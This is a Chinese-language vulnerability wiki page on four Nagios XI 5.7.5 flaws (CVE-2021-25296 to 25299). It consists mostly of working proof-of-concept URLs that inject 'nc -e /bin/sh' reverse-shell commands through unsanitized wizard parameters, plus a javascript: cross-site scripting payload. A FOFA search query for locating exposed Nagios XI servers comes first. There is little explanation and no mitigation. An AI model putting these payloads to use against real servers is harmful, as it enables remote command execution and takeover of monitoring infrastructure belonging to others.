menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right --Vulnerability-main chevron_right nagios-xi-5.7.5 多个漏洞(CVE-2021-25296~99).md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    nagios-xi-5.7.5 多个漏洞(CVE-2021-25296~99).md
    2.38 KB / 2021-05-21 09:14:38
        # nagios-xi-5.7.5 多个漏洞(CVE-2021-25296~99)

FOFA:

```
app="Nagios-XI"
```

CVE-2021-25296 PoC:

```
https://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=50c0f98fe9018dc43c81672ad1aeed5fd3f9710f013381519e553f846b5c2a86&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&plugin_output_len=&ip_address=127.0.0.1&domain=127.0.0.1&username=asdf&password=asdf&auth_file=&plugin_output_len=1024; nc -e /bin/sh 127.0.0.1 4444;&submitButton2=
```

plugin_output_len此处的变量未清除,可以给出command execution。例如:plugin_output_len=1024; nc -e /bin/sh 127.0.0.1 4444;

CVE-2021-25297

代码位置:/usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php

POC(适用于管理员/非管理员身份验证)


```
https://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=4e4f78ca5c24c7c526dc86b23092b81c3231a7bf59e1eb67f9918b8daf7b6de9&nextstep=3&wizard=switch&ip_address=127.0.0.1;nc -e /bin/sh 127.0.0.1 4445;&port=161&snmpversion=2c&snmpopts%5Bsnmpcommunity%5D=public&snmpopts%5Bv3_security_level%5D=authPriv&snmpopts%5Bv3_username%5D=&snmpopts%5Bv3_auth_password%5D=&snmpopts%5Bv3_auth_proto%5D=MD5&snmpopts%5Bv3_priv_password%5D=&snmpopts%5Bv3_priv_proto%5D=DES&portnames=number&scaninterfaces=on&bulk_fields%5B%5D=ip_address&bulk_fields%5B%5D=&bulk_fields%5B%5D=&bulk_options=&bulk_fields%5B%5D=&bulk_fields%5B%5D=&warn_speed_in_percent=50&crit_speed_in_percent=80&warn_speed_out_percent=50&crit_speed_out_percent=80&default_port_speed=100&submitButton2=
```

ip_address此处的变量未清除,可以给出command execution。例如:ip_address=1024; nc -e /bin/sh 127.0.0.1 4444;

CVE-2021-25298

代码路径:/usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php

POC(适用于管理员/非管理员身份验证)

```
https://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=e2401df06a3892ba612df20e1ce2f559d7647c4b5fcba7f64c23c0ea9df1564f&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1;nc -e /bin/sh 127.0.0.1 4445;&port=5693&token=123&submitButton2=
```

ip_address此处的变量未清除,可以给出command execution。例如:ip_address=1024; nc -e /bin/sh 127.0.0.1 4444;

CVE-2021-25299

代码位置:/usr/local/nagiosxi/html/admin/sshterm.php

PoC:

```
https://10.0.2.15/nagiosxi/admin/sshterm.php?url=javascript:alert(1)

```
from:https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs
    links
    file_download